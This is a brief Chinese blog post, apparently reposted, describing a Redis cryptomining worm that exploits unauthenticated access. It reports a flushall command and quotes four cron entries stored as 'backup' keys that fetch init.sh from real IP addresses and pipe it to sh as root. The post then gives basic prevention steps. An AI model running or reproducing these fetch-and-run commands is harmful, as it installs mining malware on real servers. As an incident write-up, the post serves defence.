No Data

redis扩散病毒之redis数据丢失并设置backup

转载  作者:斩雪碎光阴  发布于:2024年11月18日  阅读量:127
  分类:  标签:

1.问题

开启redis的监控功能

发现有flushall命令

同时设置了4个backup


4个backup对应的value值如下

*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh

*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh

*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh

*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh\


2.病毒说明

这是一种Redis扩散病毒,专门利用Redis未授权访问漏洞的挖矿病毒


3.预防措施

设置密码

限制ip访问

相关文章